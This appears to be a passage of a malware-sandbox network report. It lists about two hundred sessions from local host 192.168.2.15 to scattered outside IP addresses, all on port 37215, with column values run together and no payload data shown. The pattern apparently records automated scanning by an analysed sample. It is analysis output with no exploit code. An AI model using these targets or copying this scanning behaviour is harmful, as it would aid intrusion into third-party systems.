                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4276192.168.2.1541324197.212.177.17137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4277192.168.2.154641468.205.87.5737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4278192.168.2.1549432197.166.97.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4279192.168.2.1544964188.205.187.20037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4280192.168.2.154432241.110.180.12837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4281192.168.2.1560862197.1.171.3237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4282192.168.2.1534852197.48.101.24937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4283192.168.2.153685864.88.236.20537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4284192.168.2.1558408197.255.165.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4285192.168.2.1539348157.99.25.15337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4286192.168.2.1549286160.86.9.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4287192.168.2.1551972223.44.108.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4288192.168.2.1544388197.99.216.4337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4289192.168.2.1534976197.121.181.10237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4290192.168.2.1549276197.34.134.21437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4291192.168.2.1544242197.21.16.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4292192.168.2.1543652157.170.226.3737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4293192.168.2.156093041.79.118.12437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4294192.168.2.154794241.75.241.11237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4295192.168.2.1553678157.142.93.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4296192.168.2.1547762157.101.198.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4297192.168.2.1553748157.53.22.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4298192.168.2.1542560157.163.24.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4299192.168.2.154249641.192.91.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4300192.168.2.1540794216.155.15.537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4301192.168.2.1537204197.235.143.2437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4302192.168.2.1543030157.57.191.20737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4303192.168.2.1533648197.124.226.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4304192.168.2.153456241.239.28.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4305192.168.2.155004292.89.234.4837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4306192.168.2.1533212157.63.49.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4307192.168.2.155121241.170.133.1437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4308192.168.2.153549841.27.5.3137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4309192.168.2.1557880157.129.130.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4310192.168.2.1560238157.123.124.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4311192.168.2.1548516197.219.160.24737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4312192.168.2.1539426157.0.27.17737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4313192.168.2.1560002197.101.146.4537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4314192.168.2.155101288.218.1.737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4315192.168.2.153542641.159.118.16937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4316192.168.2.155720627.26.44.4437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4317192.168.2.1553638101.165.24.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4318192.168.2.1543704197.9.160.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4319192.168.2.1548466157.50.168.2537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4320192.168.2.1539134157.28.42.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4321192.168.2.1547764197.204.130.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4322192.168.2.1550390197.23.136.4637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4323192.168.2.155319841.104.221.19837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4324192.168.2.1537362197.7.202.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4325192.168.2.153637241.97.28.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4326192.168.2.153955474.56.170.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4327192.168.2.155764441.43.230.10337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4328192.168.2.155030041.218.242.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4329192.168.2.154558464.126.149.25337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4330192.168.2.1538638144.65.139.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4331192.168.2.1541262157.129.22.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4332192.168.2.1546934157.25.204.8737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4333192.168.2.153453054.135.179.12037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4334192.168.2.1538490157.171.109.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4335192.168.2.1558966157.15.56.24437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4336192.168.2.1539468149.222.113.12737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4337192.168.2.154278467.36.249.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4338192.168.2.1543826157.85.122.19237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4339192.168.2.153707241.234.228.5137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4340192.168.2.1548524197.195.189.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4341192.168.2.1537528182.92.216.137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4342192.168.2.1539548188.125.49.7337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4343192.168.2.153375641.56.39.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4344192.168.2.1557994157.154.254.5637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4345192.168.2.1536682197.182.73.22237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4346192.168.2.1535202197.162.151.10937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4347192.168.2.154906041.70.254.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4348192.168.2.154294631.140.13.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4349192.168.2.154455241.232.123.17637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4350192.168.2.154987814.96.126.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4351192.168.2.1550972104.92.8.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4352192.168.2.1548292197.160.116.2237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4353192.168.2.1556484157.201.230.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4354192.168.2.155432641.42.225.14137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4355192.168.2.1558410157.183.165.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4356192.168.2.1551474197.77.203.19937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4357192.168.2.1552972157.69.233.2037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4358192.168.2.1557444197.31.86.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4359192.168.2.1544038197.22.120.17437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4360192.168.2.1546876220.96.142.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4361192.168.2.1535714157.216.1.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4362192.168.2.154371041.186.189.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4363192.168.2.1554720198.241.171.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4364192.168.2.1540178157.62.107.17537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4365192.168.2.1533592197.19.4.23837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4366192.168.2.1533754157.253.111.10537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4367192.168.2.153326241.115.37.10137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4368192.168.2.153295269.122.242.3337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4369192.168.2.1541886157.186.192.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4370192.168.2.154433640.65.228.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4371192.168.2.1545644157.206.170.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4372192.168.2.1558654166.148.182.937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4373192.168.2.1545996197.219.32.10637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4374192.168.2.1554990197.44.234.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4375192.168.2.156039241.15.120.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4376192.168.2.154088841.148.218.23437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4377192.168.2.155823841.147.30.11737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4378192.168.2.1551990197.213.156.8937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4379192.168.2.1536166197.239.181.12537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4380192.168.2.1538532197.88.217.19737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4381192.168.2.1540640197.34.36.10037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4382192.168.2.1552882157.226.175.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4383192.168.2.1543540197.62.235.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4384192.168.2.154296040.166.154.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4385192.168.2.1537162197.134.13.19437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4386192.168.2.1533086197.47.196.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4387192.168.2.1535254157.232.202.13737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4388192.168.2.1553208157.202.88.19537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4389192.168.2.1557968157.230.242.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4390192.168.2.154481041.65.191.4937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4391192.168.2.1536700157.166.227.14837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4392192.168.2.1542292197.72.18.237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4393192.168.2.155608241.68.72.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4394192.168.2.1539364197.220.121.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4395192.168.2.1542558157.97.123.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4396192.168.2.154060641.223.211.11937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4397192.168.2.1553926157.135.222.6837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4398192.168.2.1541050197.249.82.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4399192.168.2.153558041.133.225.9937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4400192.168.2.1533136108.86.155.1837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4401192.168.2.1557122197.165.44.3837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4402192.168.2.1539398197.16.48.5237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4403192.168.2.1534516157.100.183.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4404192.168.2.1543522197.133.99.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4405192.168.2.1556248197.137.191.15437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4406192.168.2.153816841.228.15.837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4407192.168.2.1545942157.231.20.22437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4408192.168.2.1539424197.208.3.11637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4409192.168.2.154725841.215.68.16637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4410192.168.2.154381641.62.194.16337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4411192.168.2.155928871.24.57.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4412192.168.2.1554868197.22.70.18337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4413192.168.2.1547902197.45.55.20637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4414192.168.2.1560760189.198.246.15537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4415192.168.2.153355238.179.17.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4416192.168.2.1533954157.193.20.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4417192.168.2.1534248196.117.170.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4418192.168.2.15524761.39.78.21737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4419192.168.2.1548462197.10.170.5537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4420192.168.2.1549746207.9.61.20837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4421192.168.2.156093041.100.128.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4422192.168.2.1559248207.233.156.23337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4423192.168.2.1557708122.77.207.6637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4424192.168.2.1554336197.199.186.6937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4425192.168.2.1557390197.213.243.9337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4426192.168.2.154567441.201.164.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4427192.168.2.1548326157.123.39.16437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4428192.168.2.153961041.253.165.10837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4429192.168.2.1536982197.213.11.20937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4430192.168.2.153341641.251.99.1637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4431192.168.2.154336834.238.104.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4432192.168.2.154483841.22.47.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4433192.168.2.1540038197.55.44.13837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4434192.168.2.1541660197.108.26.11537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4435192.168.2.1542568157.78.192.2337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4436192.168.2.154870841.76.168.2937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4437192.168.2.1534740157.84.165.10437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4438192.168.2.1550554207.3.143.6337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4439192.168.2.1551916157.215.222.037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4440192.168.2.155609041.103.144.17837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4441192.168.2.1545812189.64.164.18537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4442192.168.2.154350242.49.22.22737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4443192.168.2.1551224197.10.105.19037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4444192.168.2.154595041.31.72.4137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4445192.168.2.1550702157.198.249.5437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4446192.168.2.1536982130.190.69.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4447192.168.2.1541038157.160.78.9037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4448192.168.2.153533841.64.196.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4449192.168.2.1535794188.206.70.9837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4450192.168.2.155841441.14.102.7937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4451192.168.2.153817841.86.117.22637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4452192.168.2.1538178197.106.197.23237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4453192.168.2.155137441.68.33.24037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4454192.168.2.1548582157.167.222.14237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4455192.168.2.1557284157.188.51.1037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4456192.168.2.1542002157.209.179.6737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4457192.168.2.154391487.123.64.22937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4458192.168.2.1549638157.182.162.25237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4459192.168.2.155083041.203.49.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4460192.168.2.155981444.112.243.17037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4461192.168.2.1535874197.240.154.14537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4462192.168.2.153317672.71.250.14737215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4463192.168.2.155782241.33.137.15637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4464192.168.2.1549060157.37.135.5837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4465192.168.2.1545740157.70.50.23037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4466192.168.2.1560634133.54.127.4037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4467192.168.2.1543878163.100.6.8237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4468192.168.2.1535508157.51.123.3037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4469192.168.2.1544950157.185.44.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4470192.168.2.1550678197.82.5.24637215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4471192.168.2.1534590131.83.60.8037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4472192.168.2.1538252157.109.228.7537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4473192.168.2.1539666157.180.174.12337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4474192.168.2.1549166157.29.208.3937215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4475192.168.2.1547926157.1.17.19337215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4476192.168.2.1534494186.177.247.3537215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4477192.168.2.1536306197.192.41.2137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4478192.168.2.1534006197.143.169.18837215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4479192.168.2.155905441.61.72.7437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4480192.168.2.1541980197.57.180.15137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4481192.168.2.1540438157.45.115.6137215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4482192.168.2.153445641.100.34.14037215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4483192.168.2.1542558157.61.242.18437215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          4484192.168.2.155545241.98.192.13237215
                                                          TimestampBytes transferredDirectionData


                                                          Session IDSource IPSource PortDestination IPDestination Port
